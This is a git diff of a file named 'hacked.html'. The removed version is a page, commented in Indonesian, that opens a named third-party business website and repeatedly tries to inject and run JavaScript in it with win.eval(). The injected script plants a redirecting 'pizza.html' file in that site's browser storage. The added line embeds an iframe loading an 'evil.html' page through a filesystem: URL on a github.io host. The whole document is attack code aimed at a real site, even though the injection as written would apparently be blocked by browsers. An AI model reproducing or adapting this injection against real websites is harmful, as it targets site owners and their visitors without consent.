--- a/hacked.html
+++ b/hacked.html
@@ -1,57 +1,1 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-  <meta charset="UTF-8">
-  <title>Web 1 - Injector</title>
-</head>
-<body>
-  <h1>Web 1: Injector ke Web 2</h1>
-  <button onclick="openWeb2()">Buka Web 2 & Buat File</button>
-
-  <script>
-    // Ini fungsi yang akan di-inject ke Web 2
-    const injectedCode = `
-      (function createFile() {
-        const storageSize = 1024 * 1024;
-        window.webkitRequestFileSystem(window.PERSISTENT, storageSize, function(fs) {
-          fs.root.getFile("pizza.html", { create: true, exclusive: false }, function(fileEntry) {
-            fileEntry.createWriter(function(fileWriter) {
-              const blob = new Blob([
-                '<meta http-equiv="refresh" content="0;url=https://google.com/">'
-              ], { type: "text/html" });
-
-              fileWriter.write(blob);
-
-              fileWriter.onwriteend = function() {
-                alert("File berhasil dibuat di Web 2: " + fileEntry.toURL());
-              };
-
-              fileWriter.onerror = function(err) {
-                alert("Gagal menulis file: " + err);
-              };
-            });
-          }, function(err) {
-            alert("Gagal membuat file: " + err);
-          });
-        }, function(err) {
-          alert("Gagal akses FileSystem API: " + err);
-        });
-      })();
-    `;
-
-    function openWeb2() {
-      const win = window.open("https://bakpiakukustugu.co.id/", "_blank");
-
-      // Nunggu sampai Web 2 load, baru inject kode
-      const interval = setInterval(() => {
-        try {
-          win.eval(injectedCode); // inject dan jalankan
-          clearInterval(interval);
-        } catch (err) {
-          console.log("Nunggu Web 2 load...", err);
-        }
-      }, 500);
-    }
-  </script>
-</body>
-</html>
+<iframe src="filesystem:https://lanaya113505.github.io/temporary/evil.html"></iframe>
